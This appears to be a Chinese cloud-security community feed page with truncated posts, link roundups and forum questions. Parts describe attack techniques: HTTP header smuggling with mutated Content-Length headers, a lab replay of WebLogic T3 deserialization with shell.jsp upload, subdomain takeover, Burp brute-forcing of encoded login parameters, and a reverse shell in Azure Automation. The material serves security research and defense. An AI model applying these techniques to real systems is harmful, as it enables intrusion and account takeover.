当前节点:huoxian
时间节点
2022年7月1日 18:01火线zone
本文介绍了一种识别头走私的新技术,并演示了HTTP头走私如何导致缓存中毒、IP 限制绕过和请求走私。原文地址:https://notsosecure.com/hacking-aws-cognito-misconfigurations
相关脚本在文末噢~
使用HTTP头走私,可以绕过此过滤并将信息发送到它视为受信任的后端服务器。我将展示这如何导致绕过AWS API Gateway中的 IP 限制,以及一个易于利用的缓存中毒问题。然后,我将讨论如何调整用于查找这些漏洞的方法,以在黑盒场景中基于多个“Content-Length”HTTP 头(CL.CL 请求走私)安全地检测请求走私。
背景
Web 应用程序使用的 HTTP 服务器链通常可以建模为由两个组件组成:
直接处理来自用户的请求的“前端”服务器。这些服务器通常处理缓存和负载平衡,或充当 Web 应用程序防火墙 (WAF)。
前端服务器将请求转发到的“后端”服务器。这是应用程序的服务器端代码运行的地方。
这种模型通常是对现实的简化。可能有多个前端和后端服务器,而前端和后端服务器本身往往是多个服务器的链。但是,该模型足以理解和开发本文中介绍的攻击,以及最近对服务器攻击链的大多数研究。
后端服务器通常依赖前端服务器在 HTTP 请求头中提供准确的信息,例如“X-Forwarded-For”HTTP头中的客户端 IP 地址,或“Content-Length”中的请求正文长度“标题。为了准确地提供这些信息,前端服务器必须过滤掉客户端提供的这些HTTP头的值,这些值是不受信任的,不能依赖它来准确。
正题(挖掘方式)
发现漏洞点
以下示例是“Content-Length”HTTP头的变异版本:
Content-Length : 0 Content-Length abcd: 0 Content_Length: 0 [\r]Content-Length: 0
此方法主要利用了:大多数 Web 服务器在发送带有无效“Content-Length”HTTP头的请求时会返回错误的性质:
请求头:
GET / HTTP/1.1 Host: example.com Content-Length: z
响应包:
HTTP/1.1 400 Bad Request […]
接下来比较一下:以“Content-Length”HTTP头的常规形式和变异形式发送有效值和无效值时的响应。
首先是将常规
2022年7月1日 14:31火线zone
前言
护网时平时遇到的针对weblogic等中间件漏洞利用以及漏洞扫描的很多,但是我看到某态势的流量的时候发现态势的探针的监测不单单是基于披露的poc或者exp来产生的告警。
<这里是一周内的一万多条告警>
启环境
通过复现T3反序列化利用流量进行分析,这里的目的主要是对比wireshark、科*分析软件和某商安全设备的全流量的数据包告警分析。
cd CVE-2020-14882 docker-compose up -d
docker ps
http://192.168.166.130:7001/console/login/LoginForm.jsp
分析
直接使用wireshark抓包是无法抓取不到数据包的,原因是nat模式下不走网卡,所以这里涉及到了tips就是添加路由
route add 192.168.166.130 mask 255.255.255.255 192.168.0.1
用完删除
route delete 192.168.166.130 mask 255.255.255.255 192.168.0.1
但是此时似乎是没有用的,因为我们在进行漏洞利s用的时候走的是http协议,传输层走的是tcp但是依旧是无法看到详细的流量数据。
设置虚拟机为桥接模式,再次尝试获取流量
已成功获取到数据流量。使用命令查看对目标攻击的所有流量
ip.addr==192.168.0.120
追踪一下tcp流
直接追踪t3流量,因为weblogic使用的协议为T3,当然态势内的漏洞监测也是基于t3协议来告警触发的。
上面两部分的内容是客户端和服务端的信息
t3 7.0.0.0 AS:10 HL:19 HELO:12.2.1.3.false AS:2048 HL:19 MS:10000000 PN:DOMAIN
在使用paylaod的时候会给服务端发送请求,正常情况下我们能够找到的poc或者说exp的工作原理大部分都是基于版本来校验的
当然这里的环境版本为12.2.1.3.0
这里根据不通的流可以看出来。这一点儿的话其实可以根据python脚本的内容也能看出来校验机制,这一点儿跟很多厂商的漏扫的原理应该是一致的。
这里我执行了几条命令,来查看一下流量特征
whoami
ls
pwd
上传的shell.jsp文件做编码
序列化的部分就是在这一部分完成的
回头看一下某报警日志的流量
这里触发规则库的内容是由于探针监测到流量中
2022年7月1日 11:31火线zone
安全->云安全->多云安全
https://zone.huoxian.cn/d/1315
AWS:CNAME 子域接管
https://zone.huoxian.cn/d/1316-awscname
用 EKS Anywhere (EKS-A) 裸机确保 Kubernetes 的安全
https://blog.aquasec.com/amazon-eks-anywhere
支持在裸机上部署的 Amazon EKS Anywhere 的安全问题发现
https://sysdig.com/blog/adapting-security-to-amazon-eks-anywhere-on-bare-metal/
如何在 Pod 安全策略失效后确保 Kubernetes Pods 的安全
https://www.cncf.io/blog/2022/06/30/how-to-secure-kubernetes-pods-post-psps-deprecation/
Crawl, walk, run 执行你的 Iac 安全计划
https://bridgecrew.io/blog/how-to-implement-an-infrastructure-as-code-security-program/
基于云内核的未来云计算架构
https://www.infoq.cn/article/d5o4dLSgqgqtOYkY2L8b
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年6月30日 16:32火线zone
这篇文章涵盖了所有技术方面,以便您可以使用其他签名扩展接管扫描。原文地址:https://0xpatrik.com/subdomain-takeover-ns/
CNAME 和 NS子域名接管区别
让我们先解释一下 NS 接管与传统的 CNAME 子域接管有何不同。我假设您对 CNAME 子域接管了如指掌(如果没有,请在此处继续)。在 NS 子域接管中,我们希望能够控制DNS 服务器上的整个 DNS 区域。众所周知,DNS 有一个层次结构,每个层次都可以由不同的名称服务器提供服务:
为了便于读者明白,我选择用一个简单的例子来解释整个场景。我拥有一个名为的域wolframe.eu,我将其用于测试目的。这些是该域的(权威)名称服务器:
如您所见,DNS 区域由 AWS(更具体地说是 AWS Route53)管理。我们得到的结果dig是非权威答案。非权威意味着它不是由权威 DNS 服务器(本示例中的四个 AWS 之一)返回,而是由某个中间人返回。这个中间人是8.8.8.8递归的 Google DNS 服务器,如@8.8.8.8用dig命令所示。您可以通过更改为四个 AWS 服务器之一来获得权威答案@8.8.8.8,例如@ns-1276.awsdns-31.org. 这种区别在后面的章节中将是至关重要的。
这是我在 Route53 中的 DNS 区域:

wolframe.eu只有一个 A 记录设置为1.1.1.1。
一旦 DNS 请求对任何一个有问题,*.wolframe.eu就会随机选择这四个 AWS 名称服务器之一,并返回 DNS 结果:

现在想象一下。我删除了 Route53 中的 DNS 区域,但我保留了指向 AWS 的 NS 记录。现在我得到:

现在,如果攻击者只是在 Route53 中创建新的 DNS 区域,他就可以返回任何 DNS 响应。这是NS子域接管的一个基本前提。我刚刚解释的场景有多个警告。我们将在接下来的部分中介绍这些内容。
自定义名称服务器
DNS 规范不要求名称服务器位于同一域中。想象一下example.com由两个名称服务器提供服务:
ns.gooddomain.com ns.baddomain.com
如果至少有一个 NS 记录的规范域名的基域可供注册,则托管域名容易被 NS 子域接管。
换句话说,如果baddomain.com不存在,攻击者可以注册它并完全控制example.com(
2022年6月30日 16:32火线zone
大家好,我是来自Aqua的工程师陈宇,今天主要想跟大家一起讨论下关于多云安全的问题。
具体的分享内容,我将从下面几个问题展开:
什么是多云?
针对多云场景出现的安全运维方面的问题有哪些?
如何利用好的工具和方法解决这些问题?

什么是多云,怎么去定位多云场景?
多云安全是云和安全之间的一个交叉领域,是这两个领域之间交叉的一个新的细分。同时,这两个行业有一个很大特点,就是它非常能够造词!有非常非常多的新的名词在每年涌现出来,说明这个行业非常欣欣向荣,蓬勃发展。
但是,也会带来一个不好的问题,它会使得每一个人对一些相同的词有不同的认知。所以,我们今天来说说这个Scope究竟是什么?

今天的多云场景,按照大多数理解来讲,多云就是多个公有云。数据中心全部是在云上,例如有一部分在AWS,有一部分在阿里云,这是一个典型的多云场景。
提到多云,大多数时候指的是云基础架构,这是介于基础架构的技术特性。如果一个基础架构具备一些原生云的特性,这种基础架构就是一个云基础架构。原生云的能力例如多租户、按需扩展、无中断部署、高弹性、高可用等,像AWS,AirCloud,腾讯云确实是云,但多云场景下其实也有几个不同的分支。

第一个分支:公有云,没有线下的数据中心,所有数据中心的基础架构全部都在公有云上。
第二个分支:一部分数据在公有云上,一部分数据在线下的私有云上。

接下来,我们讨论下第二个问题,在多云的场景之下,我们会遇到什么样的问题?在讲之前,有两种场景,一种是纯公有云,一种是公有云和私有云的混合云,我们在讨论的时候把这两种场景分开来看。
第一种场景:纯公有云,没有一个用户,没有线下的数据中心,所有的基础架构全部都在公有云上。
一部分在AWS,一部分在阿里云。这时候可以看到很多表象上安全运维的问题,例如问题响应速度慢,实施安全措施复杂度高等问题。背后的原因究竟是什么呢?一个是不同的云服务商在某一些技术的实现性上,它的技术栈是不一样的,导致了企业内部的一些既有的的标准没有办法在这些不同的云厂商上实现统一标准的完整落地。坦白说,这个问题很难解决,但是又对安全十分的重要。
安全是一个非常难以量化的过程,这也是它的一个痛点。现在做安全更多的实现的方法是面加点的管理方法。面指的是攻击面,降低攻击面可以有效降低风险,但如果把攻击面降到最低,那正常的业务可能就没法展开。安全和业务之间是互相拉扯的关系。安全事情做的越多,业务效率就越容易受到影响。
2022年6月30日 12:02火线zone
一开始执行过 dtctl rm -d , 再次执行 dtctl install 时报如下错误
2022年6月30日 12:02火线zone
部署时发现有个容器一直重启

打开日志查看

经咨询解答是需要修改 dtctl 脚本的net.core.somaxconn 的值,我修改成4096 就行了
2022年6月30日 11:32火线zone
数字化时代云安全能力建设及趋势
https://zone.huoxian.cn/d/1310
云安全漏洞数据库
https://www.cloudvulndb.org/
OSS任意文件上传的两个小TIPS
https://www.t00ls.com/articles-66238.html
CloudGoat detection_evasion 场景:规避 AWS 安全响应检测
https://rhinosecuritylabs.com/cloud-security/cloudgoat-detection_evasion-walkthrough/
IAM 在维护云安全方面的作用
https://www.tripwire.com/state-of-security/security-data-protection/cloud/role-iam-maintaining-cloud-security/
在 Azure Service Fabric 中存在 Linux 容器逃逸漏洞
https://www.darkreading.com/remote-workforce/patch-now-linux-container-escape-flaw-azure-service-fabric
AzureRT:一款能够实现各种 Azure 红队技战术的 PowerShell 模块
https://www.freebuf.com/articles/network/337101.html
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年6月29日 15:31火线zone
原文通过结合h1报告详细阐述7大安全问题,为了方便读者理解还添加了本人推荐的优秀技术文章,欢迎各位批评指正。原文来自hackerone:https://www.hackerone.com/application-security/7-common-security-pitfalls-avoid-when-migrating-cloud
在一项调查中,96% 的决策者正在实施云计划。将工作负载迁移到云端有很多好处:
成本是云部署的主要优势之一。总部位于新西兰的云会计公司 Xero使用 AWS 服务将毛利率提高了81% 。另一个驱动因素是获得强大的机器学习技术,这有助于 NSA 决定迁移。
但是,迁移到云端存在挑战,安全性是一个大问题。
七个常见安全陷阱
没有人迁移到云端会变得比迁移之前更不安全。阅读下文以了解如何在迁移到云时防止此类安全性倒退。
暴露敏感信息
OWASP Top 10将敏感信息泄露列为第三大安全风险是有原因的。一段时间以来,敏感数据泄露一直是个问题。但是,迁移到云时会出现新的风险。
Amazon Web Services (AWS) 提供了一项名为S3的服务。S3 为用户提供了一个简单的存储服务(因此得名)。您可以将数据放入 S3“存储桶”以用于其他服务或用于备份目的。例如,您可以将您的数据库备份放入 S3 以廉价地存储它们。批处理所需的文件也可以放在 S3 中。
不幸的是,有许多 S3 存储桶是公开的,这意味着任何有 Internet 连接的人都可以访问其中的数据。当坏人发现这些暴露的存储桶时,它们会导致严重的数据泄露(点击查看10个最严重的 Amazon S3 漏洞)。
在此,为各位整理了相关存储桶漏洞挖掘方式:
你的GCP桶中有多少是可以公开访问的?它可能比你想象的要多...
存储桶上传策略和签名 URL的绕过及利用
您不必成为下一个 S3 数据泄露事件。您可以采取一些具体步骤来确保您的 S3 存储桶是安全的:
创建构建管道。


开发人员不应直接接触 S3 存储桶配置。S3 具更加规范的默认设置,可让您的存储桶私有化。任何更改都应通过构建管道进行,而不是由用户直接进行。
考虑使用深度防御策略。


Amazon 推荐的策略是我们将 Amazon CloudFront 和存储桶策略放在 S3 存储桶前面,从而防止使用 S3 URL 暴露它们。查看文档了解详细信息。
使用良好的 IAM 策略。
2022年6月29日 15:31火线zone
大家好,我是中国信通院的孔松,今天主要为大家分享一下在数字化背景下安全能力建设的一些要求和趋势。

我今天的分享主要包括四大部分。
一、梳理云时代企业安全建设面临的一些新的需求,新的挑战;
二、探索云平台如何去做一些安全性的建设;
三、从用户视角出发,在企业上云用云的过程中,如何去开展云安全防护的建设;
四、对整个云安全的趋势做一定的展望。


我们可以看到,这两年随着企业数字化转型的不断推进,我国云计算市场规模呈现一个蓬勃发展的态势。
在国家政策层面,积极的推动企业上云用云,包括二零三五年远程目标纲要,以及十四五数字经济发展规划,都提出了要实施上云用数赋智的行动。像云计算,网络安全等这种新兴的数字产业,需要去大力的培育。而同时,即使在新冠疫情的冲击之下,我国整个云计算市场仍然保持着一个比较稳定的增速。2021年,据我们统计,整个国内的云计算市场达到了3000多亿元,而其中公有云市场占据了比较高的比例达到了2000多亿元,增速相较于2020年达到了70%。

因此,随着整个云计算的持续发展,它也越来越成为黑客攻击的重要目标。根据相关的数据可以看到,在数量上来说,云平台承载更多的攻击,与传统的IT环境相比,它所占的安全事件的比例是远超过传统IT环境的。而在类型上来说,一方面云计算也面临着典型的攻击方式和事件类型,同时也会有一些新的攻击方式,包括云计算引入了虚拟化容器微服务等新的技术,这些新技术也成为了攻击者的利用对象,比如一些被部署恶意容器的事件等。
同时,这两年软件供应链事件也是受到了非常多的关注。尤其是在云计算场景下,一方面涉及到非常多的容器镜像,同时,云平台的云服务商可能也被黑客作为一个突破口,利用云平台的一些薄弱点,或者云服务商的一些能力的薄弱点,进而去影响云上的租户。

在整个严峻的态势背景之下,企业越来越重视云安全的建设。我们在去年开展了相应的发展调查报告。在这个调查中,我们了解到,企业在选择云服务商的时候,除了产品的价格这些考虑因素之外,服务安全性是他们最关注的一点。他们会选择相对可信、安全的云服务商。第二,从整个市场上来看,公有云安全服务的市场也呈现着一个稳定增长的态势。据Gartner的统计,整个21年,全球的市场规模达到了100多亿美元,而2022年的话也是保持着一个较好的增幅,不管是市场层面,还是用户层面,对于云安全都是呈现越来越重视的趋势。

那么,我们该如何去开展整个云安全建设?在我看来更
2022年6月29日 11:31火线zone
在AWS Elastic Beanstalk 中从 SSRF到RCE
https://zone.huoxian.cn/d/1303-aws-elastic-beanstalk-ssrfrce
多云环境的风险发现
https://zone.huoxian.cn/d/1305
Sysdig 增加了使容器运行时间不可变的能力
https://containerjournal.com/features/sysdig-adds-ability-to-make-container-runtimes-immutable/
如何用 Trivy 保证你的 Kubernetes 集群的安全
https://blog.aquasec.com/kubernetes-cluster-security-with-trivy
用 Sysdig 的 Drift Control 防止容器运行时攻击
https://sysdig.com/blog/preventing-runtime-attacks-drift-control/
通过 Fuzzing CNCF 全景图提高安全性
https://www.cncf.io/blog/2022/06/28/improving-security-by-fuzzing-the-cncf-landscape/
CNCF 可观测性白皮书中文版
https://mp.weixin.qq.com/s/2xt1kHqJ2Sj2c4u08d1ejA
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年6月29日 11:01火线zone
充分利用 payload processing 功能:
挖洞时有时候会遇到需要爆破的字段在一串编码后的中间,如/login?p=dXNlcm5hbWU9eHh4eCZwYXNzd29yZD1wd2RtZDU%3d;对参数p 进行base64解码后就是username=xxxx&password=pwdmd5,要枚举用户或爆破密码时需要对username和password单独设置。
可以通过加前缀,加后缀,再进行base64编码方式:


如果对password进行爆破,假设密码是进行md5加密的,就需要先通过payload processing进行md5、再加前缀、后缀,最后进行base64编码:


payload processing 支持多种处理规则,还可以结合burp插件,比如传输方式是通过JS文件进行加密,可以配合jsEncrypter等插件对参数进行爆破。
2022年6月29日 11:01火线zone
AutoWarp 是 Azure 自动化服务中的一个严重漏洞,允许未经授权访问使用该服务的其他 Azure 客户帐户。原文地址:https://orca.security/resources/blog/autowarp-microsoft-azure-automation-service-vulnerability/
影响
AutoWarp 是 Azure 自动化服务中的一个严重漏洞,允许未经授权访问使用该服务的其他 Azure 客户帐户。这种攻击可能意味着完全控制属于目标帐户的资源和数据,具体取决于客户分配的权限。
若您为对漏洞进行修复之前,在一下情况下,很容易受到 AutoWarp 的攻击:
你一直在使用 Azure 自动化服务
您的自动化帐户中的托管身份功能已启用(默认情况下已启用)
Microsoft Azure 自动化服务
Microsoft Azure 自动化允许客户以托管方式执行自动化代码。您可以安排作业、提供输入和输出等。每个客户的自动化代码在沙箱内运行,与在同一虚拟机上执行的其他客户代码隔离。
AutoWarp:Azure 自动化安全漏洞
我们发现了一个严重的缺陷,它允许我们与管理其他客户沙箱的内部服务器进行交互。我们设法通过该服务器获取其他客户帐户的身份验证令牌。怀有恶意的人可能会不断获取令牌,并利用每个令牌将攻击范围扩大到更多 Azure 客户。
完整细节
在浏览 Azure 服务列表时,看到“管理与治理”类别下的“自动化账户”,猜测这是一种允许我通过自动化控制 Azure 帐户的服务。
在创建我的第一个自动化帐户后,我意识到 Azure 自动化是自动化脚本的非常标准的服务。您可以上传 Python 或 PowerShell 脚本以在 Azure 上执行。
首先尝试查看文件系统,,便从自动化脚本中启动了一个反向 shell,成功连接,但是当执行一些常用的命令(如tasklist)时,提示:找不到。显然,负责定义操作系统应尝试执行哪些文件扩展名的PathExt环境变量被设置为一个奇怪的值。通常,它包含.exe文件扩展名,但在我们的例子中不包含。只有.CPL是存在的,它是 Windows 控制面板项目的文件扩展名。
当我查看 C:\ 驱动器时,首先引起我注意的两件事是“Orchestrator”和“temp”目录。Orchestrator 目录包含许多 DLL 和 EXE。我看到带有“sandb
2022年6月28日 16:31火线zone
[Info]
[Info] start to get latest tag of dongtai/dongtai-web
安装环节直接停止了,请问是什么情况
2022年6月28日 15:01火线zone
话题引入:云上的安全问题,究竟该企业负责还是云厂商负责?


大家好,我是来自火线安全的刘对。今天主要聊聊租户在多云环境下责任边界的划分。
我这边的分享是比较新手向的,也希望通过我的分享,大家能够对多云下的安全责任边界划分和云上的一些概念有更深的理解。


根据 IDC 的数据,在短短 16 年内,全球整体云计算市场规模从零增长到 2021 年的 7050 亿美元,到 2025 年将预计达到 1.3 万亿。
中国作为全球云计算市场中增长最快的区域,2020 年市场规模达到 487.3 亿美元,预计 2021-2025 年复合增长率为26.0%,云将重塑整个 IT 硬件、软件和服务生态。
在《电子政务》2020年第3期中刊登了《东数西算:我国数据跨域流通的总体框架和实施路径研究》,在 2022 年 2 月份,国家发改委等部门联合印发文件,“东数西算”工程正式全面启动。
可以看到,不论是从云计算市场来看还是从国家战略来看,云计算都必将是未来的趋势。

多云即在多个云服务供应商上部署云环境,多云可以为企业节约成本、提高灵活性、提高可靠性等等,根据《Flexera Releases 2021 State of the Cloud Report》中的统计信息,有 92% 的企业采用了多云的策略。
由于安全行业是一个伴生行业,在云计算蓬勃发展、绝大多数企业都采用多云策略的背景下,多云中的安全势必会越来越被关注。
云上的安全和传统的安全在某些地方有所不同,其中不可忽视的一点就是:云上的安全有些地方是由云服务商负责的,而有些是地方则是由租户自己去负责的,那么这个边界该如何划分?这是个问题。

在企业上云之前,也许有的企业会认为云上的安全问题应该都是云服务商的责任,什么服务器的安全、数据库的安全都应该由他们来负责。然而实际上并不全是如此,这就好比一个人租了一辆车,这个人在开车的时候,他的安全不全是由租车公司负责一样。
开车的安全边界是很容易区分的,例如疲劳驾驶、开车接打电话这些都是属于驾驶者本身的问题。这时也许有人会想,那么如果我打车或者坐公交,那么这个时候的安全边界又在哪里?各位可以自己去思考一下。那么其实在云上,也是有“租车”、“打车”、“公交”之分的,不过它们是另一套叫法。

IaaS 也就是基础设施即服务,云服务商提供服务器、操作系统、硬盘等等,然后自己在上面部署应用。这就类似于租车,租车公司提供车辆,然后自己开到目的地。
2022年6月28日 14:01火线zone
请问agent为啥会暂停呢,而且从日志里看都很正常。
2022年6月28日 12:31火线zone
文章有点长,但是绝对很值!原文地址:https://notsosecure.com/exploiting-ssrf-aws-elastic-beanstalk
内容速递
该博客主要讲述:发现并利用服务器端请求伪造 (SSRF) 漏洞来访问敏感数据,此外,还讨论了可能导致在 AWS Elastic Beanstalk 上使用持续部署 (CD) 管道部署的应用程序执行远程代码执行 (RCE) 的潜在领域。
AWS Elastic Beanstalk
AWS Elastic Beanstalk 是 AWS 提供的平台即服务 (PaaS) 产品,用于部署和扩展针对 Java、.NET、PHP、Node.js、Python、Ruby 和 Go 等各种环境开发的 Web 应用程序。它自动处理部署、容量配置、负载平衡、自动扩展和应用程序健康监控。
配置环境
AWS Elastic Beanstalk 支持 Web 服务器和 Worker 环境预置。
Web 服务器环境——通常适合运行 Web 应用程序或 Web API。
工作环境——适合后台作业、长时间运行的进程。


可以通过提供有关应用程序、环境的一些信息以及在 zip 或 war 文件中上传应用程序代码来配置新应用程序。下图为创建的Elastic Beanstalk 环境:

配置新环境时,AWS 会创建一个 S3 存储桶、安全组和一个 EC2 实例。它还创建一个名为aws-elasticbeanstalk-ec2-role的默认实例配置文件,该配置文件映射到具有默认权限的 EC2 实例。
从用户计算机部署代码时,zip 文件中的源代码副本被放置在名为elasticbeanstalk region-account-id的 S3 存储桶中,下图为Amazon S3 存储桶:

Elastic Beanstalk 不会为其创建的 Amazon S3 存储桶打开默认加密。这意味着默认情况下,对象未加密存储在存储桶中(并且只能由授权用户访问)。
阅读更多:https ://docs.aws.amazon.com/elasticbeanstalk/latest/dg/AWSHowTo.S3.html
默认实例配置文件的托管策略 – aws-elasticbeanstalk-ec2-role:
AWSElasticBeanstalkWebTier – 授予应用程序将日志上传到 Am
2022年6月28日 11:01火线zone
火线沙龙第26期-多云安全专场总结稿
https://zone.huoxian.cn/d/1301-26
虚拟机逃逸初探----2018rwctf_station-escape
https://tttang.com/archive/1629/
Slim.AI 将容器自动化平台与 DevOps 工作流程相结合
https://containerjournal.com/features/slim-ai-integrates-container-automation-platform-with-devops-workflows/
如何使用 Prometheus 监控和排除 Fluentd 的故障
https://sysdig.com/blog/fluentd-monitoring/
实时动态认证--对OPAL的介绍
https://www.cncf.io/blog/2022/06/27/real-time-dynamic-authorization-an-introduction-to-opal/
采用网络安全工具的高效GRC
https://www.cncf.io/blog/2022/06/27/efficient-grc-with-cybersecurity-tooling/
LambdaGuard:一款针对AWS无服务器环境安全的审计工具
https://www.freebuf.com/articles/container/337204.html
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年6月27日 19:02火线zone
对于大多数组织而言,无论多云环境是如何引入的, 保护多云平台的安全始终是摆在公司企业面前的一大挑战。在可预见的将来,它将保持多云、多厂商的世界。问题是,所有领先供应商的安全模型是否将合并,以使企业能够利用单一的优势来管理安全的所有方面,并实现更好的威胁管理和分析。
本期沙龙,我们邀请到了中国信息通信研究院 云计算与大数据研究所 开源和软件安全部副主任 孔松老师、Aqua Security亚太区的技术总监陈宇老师以及火线安全 云安全方向的研究专家 刘对老师。
三位老师分别围绕数字化时代云安全能力的建设要求和未来趋势、多云环境下对于安全建设,运维上的挑战以及判断在多云环境下的责任边界问题等进行了分享。
@孔松老师
分享议题:《数字化时代云安全能力建设及趋势》




孔老师从云计算的安全态势分析出发,为企业开展全流程云计算风险管理提供了指导建议。
@陈宇老师
分享议题:《安全->云安全->多云安全》




陈宇老师给我们讲到了安全细分领域的频繁变化,还有”不同形式”的云安全实现,多云安全的主要问题,还有云基础资源的防护原则。
@刘对老师
分享议题:《多云环境的风险发现》




刘老师他向我们讲述了作为云租户的我们,如何判断在多云环境下的责任边界问题以及所面临的挑战与缓解方法。
再次感谢几位老师的精彩分享,想要了解更多,扫描下方二维码,申请本期全部PPT+云安全技术期刊,期待你的互动~
视频回放链接:
火线沙龙第26期——数字化时代云安全能力建设及趋势
https://www.bilibili.com/video/BV1YZ4y1e7KK/
火线沙龙第26期——安全→云安全 →多云安全
https://www.bilibili.com/video/BV1VF411F7o6/
火线沙龙第26期——多云环境的风险发现
https://www.bilibili.com/video/BV1PL4y1w7sc/
2022年6月27日 11:32火线zone
你的GCP桶中有多少是可以公开访问的?它可能比你想象的要多...
https://zone.huoxian.cn/d/1298-gcp
通过错误配置的 AWS Cognito 接管 AWS 帐户
https://zone.huoxian.cn/d/1297-aws-cognito-aws
CVE-2022-25165:AWS VPN 客户端中的 SYSTEM 权限提升
https://mp.weixin.qq.com/s/IN8c4Iqi3pbuw36S4w6N0A
4 个用于管理密钥的 CNCF 项目
https://containerjournal.com/features/4-cncf-projects-for-key-management/
如果在 K8s 上运行不受信任的容器
https://www.cncf.io/blog/2022/06/23/how-to-run-untrusted-containers-in-kubernetes/
AWS 安全最佳实践
https://securityboulevard.com/2022/06/aws-security-best-practices/
InfoQ 2022 年趋势报告:DevOps 与云计算篇
https://www.infoq.cn/article/qrvLruwaMWIeoz2zbrdI
云主机 AKSK 泄露利用
https://www.freebuf.com/articles/web/337129.html
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年6月27日 09:31火线zone
也不知道是什么原因??触发熔断了??但是我没配置熔断啊~
2022年6月26日 23:31火线zone
通过本文您可以全面了解 Google Cloud Platform (GCP) 的存储服务、如何访问存储桶以及如何确保按照预期配置存储桶。原文地址:https://blog.lightspin.io/gcp-buckets-publicly-accessible
Google Cloud Storage 是 Google 的存储服务,用于存储和检索具有高可靠性、高性能和可用性的数据。对于许多公司和组织而言,存储服务在安全性方面往往是一个弱点,因为它们通常包含敏感信息,但很难正确配置。
通过本文,您可以全面了解 Google Cloud Platform (GCP) 的存储服务、如何访问存储桶以及如何确保按照预期配置存储桶。
简介
GCP 的 Cloud Storage 服务可让您创建存储桶并在其中存储对象。与所有其他 GCP 资源一样,每个存储桶都遵循以下结构的项目中:

在存储桶中,您可以创建数据对象并管理对其层次结构的每个级别的访问权限,从项目级别开始,深入到存储桶/对象级别(取决于存储桶的配置)。
在我们深入探讨如何在 GCP 中访问存储桶和对象之前,您应该了解并熟悉以下几个术语:
基本/原始角色
旧角色早于身份访问管理 (IAM)。它们包含大量权限并且非常强大。三个基本角色是所有者、编辑者和查看者,按权力的降序排列。当您检查存储桶的权限时,您会看到自动添加了一些 IAM 绑定。其中包括项目所有者、编辑者和查看者的绑定。
例如:新创建的存储桶的 IAM 权限:
gsutil iam get gs://MY-BUCKET
allUsers
代表互联网上任何人的特殊标识符。并非所有资源类型都支持此主体类型,其中包括项目资源,这意味着您不能将项目级别的权限分配给所有用户。
allAuthenticatedUsers
一个特殊标识符,代表互联网上所有已通过 Google 帐户进行身份验证的服务帐户和用户。这包括个人 Gmail 帐户。不包括未经身份验证的用户,例如匿名访问者。并非所有资源类型都支持此主体类型,其中包括项目资源,这意味着您无法将项目级权限分配给 allAuthenticatedUsers。
访问 GCP 存储分区
在管理对存储桶和对象的访问时,您可以在 IAM 和访问控制列表 (ACL) 之间进行选择。
IAM – 所有 GCP 资源中的权限机制。IAM 使您能够精细地授予对特定资源的访问权限并阻止对
2022年6月24日 17:02火线zone
通过错误配置的 AWS Cognito 接管 AWS 帐户,原文:https://notsosecure.com/hacking-aws-cognito-misconfigurations
环境背景
被测应用程序只有一个登录页面,没有公开注册功能
目标应用程序使用披露应用程序客户端 ID、用户池 ID、身份池 ID 和区域信息的 AWS Cognito JavaScript 开发工具包
AWS cognito 配置错误以允许注册新用户
注册并登录以获得经过身份验证的身份的 AWS 临时令牌
AWS 令牌可以访问用于提升访问权限的 Lambda 函数
Amazon Cognito
Amazon Cognito 管理用户身份验证和授权 (RBAC)。用户池允许登录和注册功能。身份池(联合身份)允许经过身份验证和未经身份验证的用户使用临时凭证访问 AWS 资源。
简而言之,用户池存储所有用户,身份池使这些用户能够访问 AWS 服务。
下图显示了 AWS Cognito 身份验证和授权流程。用户通过用户池进行身份验证,成功身份验证后,用户池将 3 个 JWT 令牌(ID、Access 和 Refresh)分配给用户。ID JWT 被传递到身份池,以便接收分配给身份提供者角色的临时 AWS 凭证。
参考:https://aws.amazon.com/cn/blogs/mobile/building-fine-grained-authorization-using-amazon-cognito-user-pools-groups/
攻击过程
在最近的一次渗透测试中,我们偶然发现了一个登录页面。它没有暴露其他与身份验证相关的功能,例如忘记密码或注册页面。
经过进一步调查,我们发现该应用程序使用 AWS Cognito 通过 JavaScript 开发工具包进行身份验证和授权。客户端上的 JavaScript SDK 通过 JavaScript 配置文件公开了 App Client ID、User Pool ID、Identity Pool ID 和区域信息等数据。对于 AWS Cognito 的 JavaScript SDK需要此信息才能访问 Cognito 用户池并验证用户。
Amazon Cognito 具有经过身份验证和未经身份验证的模式来为用户生成 AWS 临时凭证。任何人都可以使用特定的 API 调用获得未经身份验证
2022年6月24日 12:02火线zone
同花顺:Azure Functions中的权限提升 - 火线 Zone-云安全社区
https://zone.huoxian.cn/d/1295-azure-functions
AWS RDS 漏洞导致 AWS 内部服务凭证泄露 - 火线 Zone-云安全社区
https://zone.huoxian.cn/d/1293-aws-rds-aws
Google Cloud Platform中的权限提升——第 1 部分 (IAM) - 火线 Zone-云安全社区
https://zone.huoxian.cn/d/1289-google-cloud-platform-1-iam
云服务枚举 - AWS, Azure and GCP | NotSoSecure
https://notsosecure.com/cloud-services-enumeration-aws-azure-and-gcp
在 AWS Elastic Beanstalk 中的 SSRF利用 | 不那么安全
https://notsosecure.com/exploiting-ssrf-aws-elastic-beanstalk
实战阿里云OSS云攻防
https://forum.butian.net/share/1615
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年6月24日 11:02火线zone
这是 过去几个月我们在 Azure Functions 中发现 的第二个特权升级 (EoP) 漏洞。原文地址:https://www.intezer.com/blog/cloud-security/royal-flush-privilege-escalation-vulnerability-in-azure-functions/
资产过渡到云服务最常见的好处之一就是可以共同承担安全风险,但是云服务商也不能避免出现安全问题,例如:通用漏洞或者错误配置。这是过去几个月我们在 Azure Functions 中发现 的第二个特权升级 (EoP) 漏洞。
漏洞有时候是未知的或者是超出云消费者的控制,所以建议使用双保险的方式来夯实云安全:
做好基础工作:例如及时修复已批漏的漏洞,从而来降低被攻击的可能性。
实施运行监控:当云服务被攻击时,可以通过检查响应以确定攻击方式或是其他内存攻击操作。
披漏 Azure Functions 容器中的漏洞
